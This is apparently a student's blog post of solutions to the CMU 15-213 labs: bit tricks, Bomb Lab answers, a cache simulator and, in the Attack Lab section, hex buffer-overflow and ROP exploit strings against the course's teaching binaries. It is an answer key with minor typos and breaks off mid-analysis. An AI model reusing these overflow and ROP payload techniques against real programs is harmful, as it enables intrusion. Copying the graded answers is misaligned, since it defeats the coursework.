Solutions to CMU 15213 Labs

Sulley

2024-09-01

This post is an archive for my personal solutions to the ten labs for the CMU 15213 course. You can access the self-study labs at the CSAPP official website.

Lab 1: Data Lab

This lab instructs you to write functions using bit-wise operations.

bixXor

Implements xor using only ~ and &. The key is to notice that x | y == ~(~x & ~y).

1
2
3

int bitXor(int x, int y) {
  return ~(~(~x & y) & ~(x & ~y));
}

tmin

Returns the minimum two's complement integer.

1
2
3

int tmin(void) {
  return 1 << 31;
}

isTmax

Checks if the input is the maximum two's complement integer. Notice that the maximum integer has a leading 0 and all remaining bits are 1.

1
2
3

int isTmax(int x) {
  return !((x + 1) ^ ~x) & !!(x ^ ~0);
}

Another way to think the maximum integer is, it's the only number that equals to 0 when adding (1 << 31) + 1. So we can also use the following simpler code:

1
2
3

int isTmax(int x) {
  return !(x + (1 << 31) + 1);
}

allOddBits

Checks if all odd index bits are set to 1. You can create a mask to detect the pattern.

int allOddBits(int x) {
  int m = (0xAA << 8) + 0xAA;
  m = (m << 16) + m;
  return !(m ^ (m & x));
}

negate

Negates the input.

1
2
3

int negate(int x) {
  return ~x + 1;
}

isAsciiDigit

Checks if the input is an ASCII digit, e.g., hex representation between 0x30 and 0x39. We can divide the pattern into the parts. The first part is 0x30, and the second is 0x0? where ? can be 0 to 9. When examining the second part, the least significant byte either does not exceed 1000 (0x8), or is exactly 0x8 or 0x9.

int isAsciiDigit(int x) {
  int y = 0xF & x;
  return !((0x30 ^ x) >> 4) & (!(0x8 & y) | !(0x8 ^ y) | !(0x9 ^ y));
}

conditional

Implements the conditional operator x ? x : y. Just use mask to achieve it.

int conditional(int x, int y, int z) {
  int m = ~(!x) + 1;
  return (~m & y) | (m & z);
}

isLessOrEqual

Checks if the first argument is less or equal than the second argument. You can use -x == ~x + 1 and examine the sign bit.

1
2
3

int isLessOrEqual(int x, int y) {
  return !(((~x + 1) + y) >> 31);
}

logicalNeg

Implements the ! operator. That's, for any non-zero number, it returns 0 and for zero it returns 1. If the input is negative (the sign bit is 1), or the input added with -1 overflows then the input is non-zero.

1
2
3

int logicalNeg(int x) {
  return (((x >> 31) ^ 0x1) & 0x1) & ((((x + (~1 + 1)) >> 31) ^ 0x0) & 0x1);
}

howManyBits

Returns the minimum number of bits required to represent the input integer. Note that a positive integer implies a leading 0 and a negative integer implies a leading 1. Therefore in either case, we must at least have a sign bit. We can safely invert all bits of a negative integer and from the most significant bit to the least significant bit find the index at which the bit is 1.

The trick here is to binary-search such index. To do this, we must create several masks, shown as in the following code. For example, Mask_16 = 0xFFFF0000 detects whether any of the most significant 16 bits is 1. If so, it means the result is at least 16. Then we can right shift the number 16 bits to recursively examine the most significant 16 bits by applying Mask_8 = 0xFF00.

int howManyBits(int x) {
  int ToPositive = x ^ (x >> 31);
  int Mask_0 = 0x1;
  int Mask_1 = 0x2;
  int Mask_2 = 0xC;
  int Mask_4 = 0xF0;
  int Mask_8 = 0xFF << 8;
  int Mask_16 = (Mask_8 | 0xFF) << 16;

  int Count, Result = 1;
  Count = !!(ToPositive & Mask_16) << 4;
  Result += Count;
  ToPositive = ToPositive >> Count;

  Count = !!(ToPositive & Mask_8) << 3;
  Result += Count;
  ToPositive = ToPositive >> Count;

  Count = !!(ToPositive & Mask_4) << 2;
  Result += Count;
  ToPositive = ToPositive >> Count;

  Count = !!(ToPositive & Mask_2) << 1;
  Result += Count;
  ToPositive = ToPositive >> Count;

  Count = !!(ToPositive & Mask_1);
  Result += Count;
  ToPositive = ToPositive >> Count;

  Count = !!(ToPositive & Mask_0);
  Result += Count;

  return Result;
}

floatScale2

Returns 2*f where the input is interpreted as a floating-point number. You should be careful about the border cases. If the input number is NaN or infinity (i.e. the exponent is all ones), the function returns the input as required. If the input is denormalized (i.e. the exponent is all zeros), the input will be shifted left 1 bit. If it's normalized (i.e. the exponent is neither all zeros nor all zeros), we just add one to the exponent.

unsigned floatScale2(unsigned uf) {
  int MantissaMask = 0x7FFFFF,   Mantissa = MantissaMask & uf;
  int ExponentMask = 0xFF << 23, Exponent = ExponentMask & uf; 
  int Sign = (0x1 << 31) & uf;

  int IsNaNOrInfinity = !(ExponentMask ^ Exponent);
  int IsDenormalized = !(ExponentMask & Exponent);
  if (IsNaNOrInfinity) 
  {
    return uf;
  }
  else if (IsDenormalized)
  {
    int ExceptSign = uf << 1;
    return Sign | ExceptSign;
  }
  else 
  {
    int NewExponent = ExponentMask & (Exponent + (1 << 23));
    return Sign | NewExponent | Mantissa;
  }
}

floatFloat2Int

Returns bit-level equivalent of (int) x where x is interpreted as a floating number. Be aware of the border cases: (1) if the input is zero, the function also returns zero; (2) if the input is NaN or infinity, it returns 0x80000000u as required; (3) if the input is denormalized, it returns zero; (4) if the input is normalized, determine the result by checking the exponent.

int floatFloat2Int(unsigned uf) {
  int MantissaMask = 0x007FFFFF, Mantissa = MantissaMask & uf;
  int ExponentMask = 0x7F800000, Exponent = ExponentMask & uf; 
  int SignMask     = 0x80000000, Sign     = SignMask & uf;
  
  int Exp = (Exponent >> 23) - 127, Result, i, BitMask; 
      
  int IsNaNOrInfinity = !(ExponentMask ^ Exponent);
  int IsDenormalized = !(ExponentMask & Exponent);
  int IsNegative = !(SignMask ^ Sign);

  // Is +0 or -0
  if (!(uf << 1))
  {
    return 0;
  }
  
  // Is NaN or infinity.
  if (IsNaNOrInfinity)
  {
    return 0x80000000u;
  }

  // Is denormalized
  if (IsDenormalized)
  {
    return 0;
  }
  
  // Is normalized
  if (Exp < 0)
  {
    return 0;
  }
  if (Exp >= 31)
  {
    return 0x80000000u;
  }
  
  Result = 1 << Exp;
  Exp -= 1;
  for (i = 22; i >= 0 && Exp >= 0; --i, --Exp)
  {
    BitMask = !!(Mantissa & (1 << i));
    Result += BitMask * (1 << Exp);
  }

  if (IsNegative)
  {
    Result = -Result;
  }

  return Result;
}

floatPower2

Returns 2.0^x for any given integer x. The smallest non-zero floating (denormalized) number is 2^(-126+23)=2^(-149). So if the input is smaller than -149, the functions should return 0. The largest denormalized floating number in the form of 2.0^x is x^(-127). In the range of -149 and -127, we just left shift one by x+149. The smallest normalized number (also, in the form of 2.0^x) is 2^(-126) and the largest is 2^(254-127)=2^(127). In this case, we left shift x+127 by 23 to occupy the exponent part. If x exceeds 127, the function returns +INF.

unsigned floatPower2(int x) {
  if (x < -149)
  {
    return 0;
  }
  else if (x <= -127)
  {
    return 1 << (x + 149);
  }
  else if (x <= 127)
  {
    return (x + 127) << 23;
  }
  else // x > 127
  {
    return 0x7F800000;
  }
}

Lab 2: Bomb Lab

The answers to the six phases are respectively:

Border relations with Canada have never been better.
1 2 4 8 16 32
0 207
7 0
iOnUvW
4 3 2 1 6 5

If we deciphered the secret phase, the answers will be (adding string DrEvil after the third line):

Border relations with Canada have never been better.
1 2 4 8 16 32
0 207
7 0 DrEvil
iOnUvW
4 3 2 1 6 5

Note that some of the answers are not unique. Let's quickly go through these phases.

Phase 1

Find the string at address 0x402400. You can use x/s 402400 to extract it!

Phase 2

The key to solve this phase is know the functionality of each register:

%rdi: the first argument.
%rsi: the second argument.
%rdx: the third argument.
%rcx: the forth argument.
%r8: the fifth argument.
%r9: the sixth argument.

More arguments are stored in stack. Know at which positions these arguments are stored in stack and you'll get the answer!

Phase 3

This function reads two integers and switches to the address accroding to the first integer. If the destination address has a value same as the second integer, the phase passes.

This phase has multiple answers. You can choose one of the followings:

0 207
1 311
2 707
3 256
4 389
5 206
6 682
7 327

Phase 4

The key is to decode func4(x, s, e) and understand it returns some numbers of steps to find x between [s, e] using binary search. s=0 and e=14. The function returns 0 if it finds x in the very first step. So x=7.

Phase 5

This phase executes the following steps:

The answer string length is 6.
Reads a string from 0x4024b0 and compares it to the string at 0x40245e, which is flyers.
The string at 0x4024b0 is maduiersnfotvbylSo you think you can stop the bomb with ctrl-c, do you?.
The indices respectively for f, l, y, e, r, s at 0x4024b0 is 9, 15, 14, 5, 6, 7. The hex representations are 9, f, e, 5, 6, 7.
Find in the ASCII table those characters whose low hex representation is 9, f, e, 5, 6 and 7. So there are multiple possible answers.

Phase 6

This is the most difficult phase (including the secret one), in terms of it's length of assembly... Be patient and take a careful look at the assembly. You'll find this phase does the following things:

It reads six integers and stores them in stack from the bottom up.
Each integer is different and all are smaller or equal than 6.
Subtracts each integer from 7. For example, 6 turns into 1.
According to the result integer, this function jumps to the target address from 0x6032d0 and reads the value. This value is also an address. The results are stored from %rsp+32 to %rsp+72, amounting to totally eight addresses.
Sets *(*(%rsp+t)+8)=*(%rsp+t+8), where t=32, 3a, 42, ..., 6a. For t=72, the target value is zero.
It actually implements a linked list, likely implemented as follows:
1
2
3
4
struct node {
int value;
node* next;
};
This linked list has a list of non-ascending values.
Find the indices in a non-ascending order and restore the input indices.

Secret Phase

Disassembling the phase_defused function and you will find a secret secret_phase function. This is the hidden phase of this lab. The secret_phase function does:

Receives an integer less or equal than 1001.
Calls function fun7(int* s, int x) and returns 2.
The fun7(int* s, int x) function receives a pointer s to a binary search tree node and finds value x in the tree.
Your goal is to find in this tree a value that returns 2, according to the calculation rules.

This binary search tree node looks like this:

         36
       /    \
      /      \
     /        \
    8          50
   / \       /    \
  6   22    45    100
 / \  / \   / \   / \
1  7 20 35 40 47 99 1001

Lab 3: Attack Lab

This lab asks you to construct exploits to have the function output specific strings. Before start, make sure to take a glance at the handout, which has detailed instructions for this lab. Remember to use -Og to compile the .s file and use objdump -d to generate byte codes.

Phase 1

In the getbuf() function, %rsp has an address of 0x5561dc78 and the return address is located at %rsp+0x28, which is 0x5561dca0. To call the touch1() function, you should set the return address as the address of touch1(), that is, 0x4017c0.

The input to ctarget is thus:

31 32 33 34 35 36 37 38
31 32 33 34 35 36 37 38
31 32 33 34 35 36 37 38
31 32 33 34 35 36 37 38
31 32 33 34 35 36 37 38
c0 17 40 00 00 00 00 00

The first 40 bytes are arbitrary except \n.

Phase 2

In this phase, you should put 0x591997fa into %rdi and jump to 0x4017ec to execute function touch2().

The first step is to write a .s file:

1
2
3

movq $0x59b997fa, %rdi
pushq $0x4017ec
ret

Then generate its byte codes:

1
2
3

48 c7 c7 fa 97 b9 59 // movq $0x59b997fa, %rdi
68 ec 17 40 00       // pushq $0x4017ec
c0                   // ret

Write the input exploit file:

31 32 33 34 35 36 37 38
31 32 33 34 35 36 37 38
31 32 33 34 35 36 37 38
48 c7 c7 fa 97 b9 59 68  // Address 0x5561dc90, return here to execute instructions
ec 17 40 00 c3 00 00 00
90 dc 61 55 00 00 00 00  // Destination address

Phase 3

Note that in this phase, the content in the stack may be overwritten by function hexmatch(). So you must write the content in some high location of the stack.

The assembly code is:

1
2
3

movq $0x5561dca8, %rdi
pushq $0x4018fa
ret

The generated byte codes are:

1
2
3

48 c7 c7 a8 dc 61 55  // movq $0x5561dca8, %rdi
68 fa 18 40 00        // pushq $0x4018fa
c3                    // ret

The input exploit is:

48 c7 c7 a8 dc 61 55 68 // Address 0x5561dc78
fa 18 40 00 c3 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
78 dc 61 55 00 00 00 00 // Destination address
35 39 62 39 39 37 66 61 // Address 0x5561dca8, string "59b997fa"

Phase 4

In this phase, you should construct two gadgets, one for moving data 0x59b997fa into some register like %rax, and the other one for moving %rax to %rdi as the argument into the function. Last, you should return to function touch2().

You can find a function which contains the desired byte codes and returns to that location. The first gadget uses the function addval_219 and the second function is setval_426. You can choose other functions if applicable.

00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
ab 19 40 00 00 00 00 00  // Jump to middle of function addval_219 and perform pop
fa 97 b9 59 00 00 00 00  // cookie value 0x59b997fa, popped to %rax 
c5 19 40 00 00 00 00 00  // Jump to middle of function setval_426 and perform mov %rax, %rdi
ec 17 40 00 00 00 00 00  // Return to touch2()

Here is a full list of decoded byte codes for all functions in farm.c. Use Ctrl+F to search the byte patterns you want.

// 0x40199a: b8 fb 78 90 90 c3
unsigned getval_142()

// 0x4019a0: 8d 87 48 89 c7 c3 c3
unsigned addval_273(unsigned x)

// 0x4019a7: 8d 87 51 73 58 90 c3
unsigned addval_219(unsigned x)

// 0x4019ae: c7 07 48 89 c7 c7 c3
void setval_237(unsigned *p)

// 0x4019b5: c7 07 54 c2 58 92 c3
void setval_424(unsigned *p)

// 0x4019bc: c7 07 63 48 8d c7 c3
void setval_470(unsigned *p)

// 0x4019c3: c7 07 48 89 c7 90 c3
void setval_426(unsigned *p)

// 0x4019ca: b8 29 58 90 c3 c3
unsigned getval_280()

// 0x4019d6: 48 8d 04 37 c3
long add_xy(long x, long y)

// 0x4019db: b8 5c 89 c2 90 c3
unsigned getval_481()

// 0x4019e1: c7 07 99 d1 90 90 c3
void setval_296(unsigned *p)

// 0x4019e8: 8d 87 89 ce 78 c9 c3
unsigned addval_113(unsigned x)

// 0x4019ef: 8d 87 8d d1 20 db c3
unsigned addval_490(unsigned x)

// 0x4019f6: b8 89 d1 48 c0 c3
unsigned getval_226()

// 0x4019fc: c7 07 81 d1 84 c0 c3
void setval_384(unsigned *p)

// 0x401a03: 8d 87 41 48 89 e0 c3
unsigned addval_190(unsigned x)

// 0x401a0a: c7 07 88 c2 08 c9 c3
void setval_276(unsigned *p)

// 0x401a11: 8d 87 89 ce 90 90 c3
unsigned addval_436(unsigned x)

// 0x401a18: b8 48 89 e0 c1 c3
unsigned getval_345()

// 0x401a1e: 8d 87 89 c2 00 c9 c3
unsigned addval_479(unsigned x)

// 0x401a25: 8d 87 89 ce 38 c0 c3
unsigned addval_187(unsigned x)

// 0x401a2c: c7 07 81 ce 08 db c3
void setval_248(unsigned *p)

// 0x401a33: b8 89 d1 38 c9 c3
unsigned getval_159()

// 0x401a39: 8d 87 c8 89 e0 c3 c3
unsigned addval_110(unsigned x)

// 0x401a40: 8d 87 89 c2 84 c0 c3
unsigned addval_487(unsigned x)

// 0x401a47: 8d 87 48 89 e0 c7 c3
unsigned addval_201(unsigned x)

// 0x401a4e: b8 99 d1 08 d2 c3
unsigned getval_272()

// 0x401a54: b8 89 c2 c4 c9 c3
unsigned getval_155()

// 0x401a5a: c7 07 48 89 e0 91 c3
void setval_299(unsigned *p)

// 0x401a61: 8d 87 89 ce 92 c3 c3
unsigned addval_404(unsigned x)

// 0x401a68: b8 89 d1 08 db c3
unsigned getval_311()

// 0x401a6e: c7 07 89 d1 91 c3 c3
void setval_167(unsigned *p)

// 0x401a75: c7 07 81 c2 38 d2 c3
void setval_328(unsigned *p)

// 0x401a7c: c7 07 09 ce 08 c9 c3
void setval_450(unsigned *p)

// 0x401a83: 8d 87 08 89 e0 90 c3
unsigned addval_358(unsigned x)

// 0x401a8a: 8d 87 89 c2 c7 3c c3
unsigned addval_124(unsigned x)

// 0x401a91: b8 88 ce 20 c0 c3
unsigned getval_169()

// 0x401a97: c7 07 48 89 e0 c2 c3
void setval_181(unsigned *p)

// 0x401a9e: 8d 87 89 c2 60 d2 c3
unsigned addval_184(unsigned x)

// 0x401aa5: b8 8d ce 20 d2 c3
unsigned getval_472()

// 0x401aab: c7 07 48 89 e0 90 c3
void setval_350(unsigned *p)

Phase 5

Here is how you should think to solve this phase:

Function touch3(const char*) receives an address as the argument. So you should prepare an address value in %rdi.
This address value should come from %rsp. An intuitive way is use mov %rsp, %rax.
However, the cached %rsp value is not allowed to store the string value because it will be immediately transmitted to PC as the address of the next instruction. It must be a valid address.
farm.c provides a function add_xy(long, long). It can be leveraged to offset the value of %rsp.
The returned value of add_xy(long, long) is the address where the string is actually stored. It lies at the highest position of our input.

00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
06 1a 40 00 00 00 00 00  // mov %rsp, %rax
c5 19 40 00 00 00 00 00  // mov %rax, %rdi
ab 19 40 00 00 00 00 00  // pop %rax (0x48 is the offset)
48 00 00 00 00 00 00 00  // (popped offset)
42 1a 40 00 00 00 00 00  // movl %eax, %edx
69 1a 40 00 00 00 00 00  // movl %edx, %ecx
27 1a 40 00 00 00 00 00  // movl %ecx, %esi
d6 19 40 00 00 00 00 00  // call add_xy
c5 19 40 00 00 00 00 00  // mov %rax, %rdi
fa 18 40 00 00 00 00 00  // call touch3
35 39 62 39 39 37 66 61  // string "59b997fa"

Lab 4: Cache Lab

Make sure you read the handout before dong this lab.

Part A

Code for part A csim.c:

#include <getopt.h>
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <ctype.h>
#include <stdbool.h>
#include <string.h>
#include "cachelab.h"

// Should avoid global variables. For simplicity here.
int hit_count = 0;
int miss_count = 0;
int eviction_count = 0;
int verbose = 0;
int help_msgs = 0;
int t = 0, s = 0, set_num = 0, E = 0, b = 0, block_size = 0;
unsigned long offset_mask = 0, set_mask = 0, check_mask = 0;

typedef struct lru_node lru_node_t;
struct lru_node {
    int line_number;
    lru_node_t* next;
};

typedef struct cache_line {
    unsigned long check_bits;
    char* p_block;
    bool valid;
} cache_line_t;

typedef struct operation_line {
    unsigned long address;
    int data_size;
    char op;
} operation_line_t;

void print_help_msgs()
{
    printf("Usage: ./csim [hv] -s <num> -E <num> -b <num> -t <file>\n");
    printf("Options:\n");
    printf("  -h         Print this help message.\n");
    printf("  -v         Optional verbose flag.\n");
    printf("  -s <num>   Number of set index bits.\n");
    printf("  -E <num>   Number of lines per set.\n");
    printf("  -b <num>   Number of block offset bits.\n");
    printf("  -t <file>  Trace file.\n\n");
    printf("Examples:\n");
    printf("  linux>  ./csim -s 4 -E 1 -b 4 -t traces/yi.trace\n");
    printf("  linux>  ./csim -v -s 8 -E 2 -b 4 -t traces/yi.trace\n");
}

operation_line_t parse_line(char* line)
{
    operation_line_t operation_line;

    int start_index, end_index;
    char str_address[128];
    char str_size[16];
    char* end = NULL;

    if(line[0] == 'I') 
    {
        operation_line.op = 'I';
    }
    else
    {
        operation_line.op = line[1];

        start_index = end_index = 3;
        while (line[end_index] != ',') 
        {
            ++end_index;
        }
        strncpy(str_address, line + start_index, end_index - start_index);
        str_address[end_index - start_index] = '\0';
        operation_line.address = strtoul(str_address, &end, 16);

        start_index = end_index + 1;
        end_index = start_index + 1;
        while (isdigit(line[end_index])) 
        {
            ++end_index;
        }
        strncpy(str_size, line + start_index, end_index - start_index);
        str_size[end_index - start_index] = '\0';
        operation_line.data_size = atoi(str_size);
    }

    return operation_line;
}

int find_lru_index(lru_node_t* root)
{
    while (root->next != NULL)
    {
        root = root->next;
    }

    return root->line_number;
}

lru_node_t* create_node(lru_node_t* root, int used_index)
{
    lru_node_t* new_node = malloc(sizeof(lru_node_t));
    new_node->line_number = used_index;
    new_node->next = root->next;
    root->next = new_node;

    return new_node;
}

lru_node_t* find_node_with_index(lru_node_t* root, int used_index, lru_node_t** prev_node)
{
    // Start with the real rool node
    root = root->next;

    while (root != NULL)
    {
        if (root->line_number == used_index)
        {
            break;
        }
        else
        {
            *prev_node = root;
            root = root->next;
        }
    }

    return root;
}

void update_lru_node(lru_node_t* root, int used_index)
{
    if (root == NULL)
    {
        create_node(root, used_index);
        return;
    }
    
    // 1). Don't forget to set the previous node's next
    lru_node_t* prev_node = NULL;
    lru_node_t* found_node = find_node_with_index(root, used_index, &prev_node);
    if (found_node != NULL)
    {
        if (prev_node != NULL)
        {
            prev_node->next = found_node->next;
        }
        // 2). Be careful when root's next is the found node
        found_node->next = (root->next == found_node ? found_node->next : root->next);
        root->next = found_node;
    }
    else
    {
        create_node(root, used_index);
    }
}

void cache_operation(operation_line_t* operation, char* line, cache_line_t** cache_decay, lru_node_t* lru_roots)
{
    line[strlen(line) - 1] = '\0';

    char op = operation->op;
    unsigned long address = operation->address;
    int set = (address & set_mask) >> b;
    unsigned long check = ((address & check_mask) >> (s + b)) & ((1 << (s + b)) - 1);

    cache_line_t (*cache)[E] = (cache_line_t(*)[E]) cache_decay;
    cache_line_t* cache_set = cache[set];

    bool b_hit = false;
    int placement_or_hit_index = -1;
    for (int i = 0; i < E; ++i)
    {
        // Cache hit
        if (cache_set[i].valid && cache_set[i].check_bits == check)
        {
            if (op == 'M')
            {
                if (verbose) {
                    printf("%s hit hit\n", line);
                }
                hit_count += 2;
            }
            else 
            {
                if (verbose) {
                    printf("%s hit\n", line);
                }
                ++hit_count;
            }
            
            placement_or_hit_index = i;
            b_hit = true;
            break;
        }
        // Empty line
        else if (!cache_set[i].valid)
        {
            placement_or_hit_index = i;
        }
    }

    // Cache miss, do placement or eviction
    if (!b_hit)
    {
        // Has empty line, do placement
        if (placement_or_hit_index != -1)
        {
            cache_set[placement_or_hit_index].valid = true;
            cache_set[placement_or_hit_index].check_bits = check;

            if (op == 'M')
            {
                if (verbose) {
                    printf("%s miss hit\n", line);
                }
                ++miss_count;
                ++hit_count;
            }
            else
            {
                if (verbose) {
                    printf("%s miss\n", line);
                }
                ++miss_count;
            }
        }
        // All lines are occupied, do eviction
        else
        {
            placement_or_hit_index = find_lru_index(&lru_roots[set]);
            cache_set[placement_or_hit_index].check_bits = check;

            if (op == 'M')
            {
                if (verbose) {
                    printf("%s miss eviction hit\n", line);
                }
                ++miss_count;
                ++eviction_count;
                ++hit_count;
            }
            else
            {
                if (verbose) {
                    printf("%s miss eviction\n", line);
                }
                ++miss_count;
                ++eviction_count;
            }
        }
    }
    
    update_lru_node(&lru_roots[set], placement_or_hit_index);
}

int main(int argc, char* argv[])
{
    // Parse input arguments
    int opt;
    char* trace_file;

    while ((opt = getopt(argc, argv, "hvs:E:b:t:")) != -1) {
        switch (opt) {
            case 'h': 
                help_msgs = 1; 
                break;
            case 'v': 
                verbose = 1; 
                break;
            case 's':
                s = atoi(optarg);
                set_num = 1 << s;
                break;
            case 'E':
                E = atoi(optarg);
                break;
            case 'b':
                b = atoi(optarg);
                block_size = 1 << b;
                break;
            case 't':
                trace_file = optarg;
                break;
            default:
                printf("Invalid arguments!");
                break;
        }
    }

    if (help_msgs)
    {
        print_help_msgs();
        return 0;
    }

    if (s <= 0 || E <= 0 || b <= 0)
    {
        printf("Invalid argument values!\n");
        return 0;
    }

    // Compute other global variables
    t = 64 - s - b;
    offset_mask = (1 << b) - 1;
    set_mask = (1 << (s + b)) - 1 - offset_mask;
    check_mask = -(1 << (s + b));

    // Allocate memory for cache
    lru_node_t* lru_roots = calloc(set_num, sizeof(lru_node_t));
    cache_line_t (*cache)[E] = calloc(set_num, sizeof(cache_line_t) * E);
    char* p_cache_space = malloc(block_size * set_num * E);

    for(int i = 0; i < set_num; ++i)
        for(int j = 0; j < E; ++j)
        {
            cache[i][j].p_block = p_cache_space + i * (block_size * E) + j * block_size;
        }
    
    // Read file and process by line
    FILE* file = fopen(trace_file, "r");
    if (file == NULL)
    {
        printf("Cannot open file %s\n", trace_file);
        return 0;
    }
    
    char line[128];
    while (fgets(line, 128, file))
    {
        operation_line_t operation = parse_line(line);
        
        switch (operation.op)
        {
            case 'L':
            case 'S':
            case 'M':
                cache_operation(&operation, line, (cache_line_t**)cache, lru_roots);
                break;
            default:
                break;
        }
    }
    
    // Print summary and clean up memory
    printSummary(hit_count, miss_count, eviction_count);
    free(cache);
    free(p_cache_space);
    return 0;
}

One thing you should be very careful about is when we update the LRU linked list. By the way, I was wondering if there is a simpler method to implement LRU? Linked list seems to result in memory and time overhead.

Part B

This the the hardest one so far! But take it easy and think about it step by step.

For a given 32*32 matrix, each row of it has four sequential blocks in cache because each cache block contains 8 integers (32 bytes) and each row of the matrix has 4 sets of 8 integers. The cache layout for the matrix is shown as below:

 -------------------
| 0  | 1  | 2  | 3  |  row 1
 -------------------
| 4  | 5  | 6  | 7  |  row 2
 -------------------
| 8  | 9  | 10 | 11 |  row 3
 -------------------
| 12 | 13 | 14 | 15 |  row 4
 -------------------
| 16 | 17 | 18 | 19 |  row 5
 -------------------
| 20 | 21 | 22 | 23 |  row 6
 -------------------
| 24 | 25 | 26 | 27 |  row 7
 -------------------
| 28 | 29 | 30 | 31 |  row 8
 -------------------
| 0  | 1  | 2  | 3  |  row 9
 -------------------
| 4  | 5  | 6  | 7  |  row 10
 -------------------
| 8  | 9  | 10 | 11 |  row 11
 -------------------
| 12 | 13 | 14 | 15 |  row 12
 -------------------
| 16 | 17 | 18 | 19 |  row 13
 -------------------
| 20 | 21 | 22 | 23 |  row 14
 -------------------
| 24 | 25 | 26 | 27 |  row 15
 -------------------
| 28 | 29 | 30 | 31 |  row 16
 -------------------
| 0  | 1  | 2  | 3  |  row 17
 -------------------
| 4  | 5  | 6  | 7  |  row 18
 -------------------
| 8  | 9  | 10 | 11 |  row 19
 -------------------
| 12 | 13 | 14 | 15 |  row 20
 -------------------
| 16 | 17 | 18 | 19 |  row 21
 -------------------
| 20 | 21 | 22 | 23 |  row 22
 -------------------
| 24 | 25 | 26 | 27 |  row 23
 -------------------
| 28 | 29 | 30 | 31 |  row 24
 -------------------
| 0  | 1  | 2  | 3  |  row 25
 -------------------
| 4  | 5  | 6  | 7  |  row 26
 -------------------
| 8  | 9  | 10 | 11 |  row 27
 -------------------
| 12 | 13 | 14 | 15 |  row 28
 -------------------
| 16 | 17 | 18 | 19 |  row 29
 -------------------
| 20 | 21 | 22 | 23 |  row 30
 -------------------
| 24 | 25 | 26 | 27 |  row 31
 -------------------
| 28 | 29 | 30 | 31 |  row 32
 -------------------

Each block has 8 integers (32 bytes). You can see that this pattern repeats every 8 rows. So, it we use 8*8 blocking to partition this matrix, the number of misses will amount to 32*32/(8*8)*8*2=256 times (32*32/(8*8) blockings for a single matrix, each blocking produces 8 misses and two matrices).

But when adopt 8*8 blocking, the result will be 344 misses! Why is that? We can guess it's because matrix overwrites some of the caches for matrix !

To validate our assumption, we can print the addresses of and . Add printf("%p %p\n", A, B); in tracegen.c and see their addresses:

1	0x59010cdbb0c0 0x59010cdfb0c0

Note that your result may differ from mine. Recall that in the problem settings s=b=5. The addresses of and have the same lowest 16 bits. This means matrix has the same cache layout pattern as matrix . When we read the first element of , the first block will be loaded; when we read the first element of , it overwrites the block just loaded from !

With that being said, reading and writing it to causes two cache misses! The first is a cold miss which we cannot avoid, but the second is a conflict miss but it's hard to avoid.

Again, reading and writing it to also cases two misses. The first is a conflict miss with the block from . The second is a cold miss.

We do not want the conflict miss that takes place when reading . This miss happens when the cache will be overwritten by the block of . What if we do not need to update the cache? In other words, the cache always stores data from matrix . To this end, we can make use of local variables to store one block of integers from matrix . Tne cache will only get updated when we first load data into local variables. Later, the cache will be overwritten by matrix and will keep as it is.

void transpose_submit(int M, int N, int A[N][M], B[M][N])
{
  if (M == 32 && N == 32)
  {
      int i, j, block_i, block_j;
      int Temp[8];

      for (i = 0; i < N; i += 8)
          for (j = 0; j < M; j += 8)
              for (block_i = i; block_i < i + 8; ++block_i) {
                  // Load current block of A into local variables
                  for (block_j = j; block_j < j + 8; ++block_j) {
                      Temp[block_j - j] = A[block_i][block_j];
                  }
                  // Write from locals into B
                  for (block_j = j; block_j < j + 8; ++block_j) {
                      B[block_j][block_i] = Temp[block_j - j];
                  }
              }
  }
  else if (M == 64 && N == 64) 
  {
    
  }
  else
  {

  }
}

This time we get 290 misses! Full score!

The key idea here is to improve temporal locality as much as possible. To improve temporal locality, we need to try to visit data within a cache block within as much as we can. Blocking helps with this. On the other side, we must reduce the number of times of cache overwriting. Local variables help with this.

Unfortunately, when we have M=N=64 using the same code, the number of cache misses is... 4614. What the f is going on? Well, let's revist the cache layout pattern for a 64*64 matrix.

 ---------------------------------------
| 0  | 1  | 2  | 3  | 4  | 5  | 6  | 7  | row 1
 ---------------------------------------
| 8  | 9  | 10 | 11 | 12 | 13 | 14 | 15 | row 2
 ---------------------------------------
| 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | row 3
 ---------------------------------------
| 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | row 4
 ---------------------------------------
| 0  | 1  | 2  | 3  | 4  | 5  | 6  | 7  | row 5
 ---------------------------------------
| 8  | 9  | 10 | 11 | 12 | 13 | 14 | 15 | row 6
 ---------------------------------------
| 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | row 7
 ---------------------------------------
| 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | row 8
 ---------------------------------------
 .......................................
 ---------------------------------------
| 0  | 1  | 2  | 3  | 4  | 5  | 6  | 7  | row 61
 ---------------------------------------
| 8  | 9  | 10 | 11 | 12 | 13 | 14 | 15 | row 62
 ---------------------------------------
| 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | row 63
 ---------------------------------------
| 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | row 64
 ---------------------------------------

The diagram shows that 8*8 blocking only leverages 4 distinct caches and repeats every 4 rows. Let's see how it works when we use 8*8 blocking.

A Read	Miss or Hit	B Write	Cache Set	Miss or Hit
A[0][0]	M	B[0][0]	0	M
A[0][1]	M	B[1][0]	8	M
A[0][2]	H	B[2][0]	16	M
A[0][3]	H	B[3][0]	24	M
A[0][4]	H	B[4][0]	0	M
A[0][5]	M	B[5][0]	8	M
A[0][6]	H	B[6][0]	16	M
A[0][7]	H	B[7][0]	24	M

Obviously the biggest problem is when we write the last 4 rows of matrix , we overwrite the previously loaded blocks, i.e., row 0 to row 3. In this case, writes to matrix will have a miss rate of 100%.

What about using a 4*4 blocking strategy? Let's look at it!

A Read	Cache Set	Miss or Hit	B Write	Cache Set	Miss or Hit
A[0][0]	0	M	B[0][0]	0	M
A[0][1]	0	M	B[1][0]	8	M
A[0][2]	0	H	B[2][0]	16	M
A[0][3]	0	H	B[3][0]	24	M
A[1][0]	8	M	B[0][1]	0	M
A[1][1]	8	H	B[1][1]	8	M
A[1][2]	8	M	B[2][1]	16	H
